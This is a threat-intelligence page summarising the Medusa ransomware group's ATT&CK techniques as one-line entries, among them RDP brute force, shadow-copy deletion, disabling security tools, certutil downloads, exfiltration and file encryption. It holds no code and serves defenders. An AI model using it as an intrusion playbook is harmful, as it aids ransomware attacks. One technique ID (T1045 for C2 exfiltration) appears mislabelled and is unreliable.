Tactics, Techniques and Procedures for  Medusa


Sponsored by Hudson RockUse Hudson Rock's free cybercrime intelligence tools to learn how Infostealer infections are impacting your business

Initial Access (TA0001) Execution (TA0002) Defense Evasion (TA0005) Credential Access (TA0006) Discovery (TA0007) Lateral Movement (TA0008) Exfiltration (TA0010) Command and Control (TA0011) Impact (TA0040)
Valid Accounts (T1078)
Initial access through brute force or compromised credentials of legitimate RDP accounts. 		Command and Scripting Interpreter (T1059)
Uses a series of Windows commands, such as bcdedit.exe and vssadmin. 		Impair Defenses (T1562)
Employs Windows Management Instrumentation (WMIC) command-line to delete shadow copies. 		Brute Force (T1110)
Uses brute force on local RDP account passwords. 		File and Directory Discovery (T1083)
Queries specified files, folders, and file extensions. 		Remote Services (T1021)
Uses remote services for login and lateral movement via RDP and SMB. 		Exfiltration Over C2 Channel (T1045)
Transfers data to attacker-controlled servers via an existing command-and-control (C2) channel. 		Ingress Tool Transfer (T1105)
Uses certutil to download malicious files. 		Inhibit System Recovery (T1490)
Deletes shadow copies and disables the Windows System Restore feature.
Phishing (T1566)
Initial access through phishing email attachments. 		Windows Management Instrumentation (T1047)
Uses a series of Windows commands, such as bcdedit.exe and vssadmin. 		Disable or Modify Tools (T1562.001)
Terminates services or processes related to antivirus/security tools. 		Network Share Discovery (T1135)
Enumerates network shares. 		Exfiltration Over Web Service (T1567)
Exfiltrates data using web services like cloud services (e.g., Google Drive, Dropbox, etc.). 		Service Stop (T1489)
Terminates processes and services related to database servers, email servers, and backups.
External Remote Services (T1133)
Accesses the victim's network via an RDP service. 		Safe Mode Boot (T1562.009)
Abuses Safe Mode to evade endpoint detection. 		Exfiltration Over Alternative Protocol (T1048)
Exfiltrates data using alternative protocols, such as FTP/SFTP, to avoid detection by traditional methods. 		Data Encrypted for Impact (T1486)
Uses the AES-256 algorithm to encrypt files on the computer.

This information is provided by Crocodyli or Ransomware.live

© 2024 Ransomware.live. All rights reserved.  |    Contact us  |    BlueSky  |    GitHub  |    LinkedIn

  Support Ransomare.live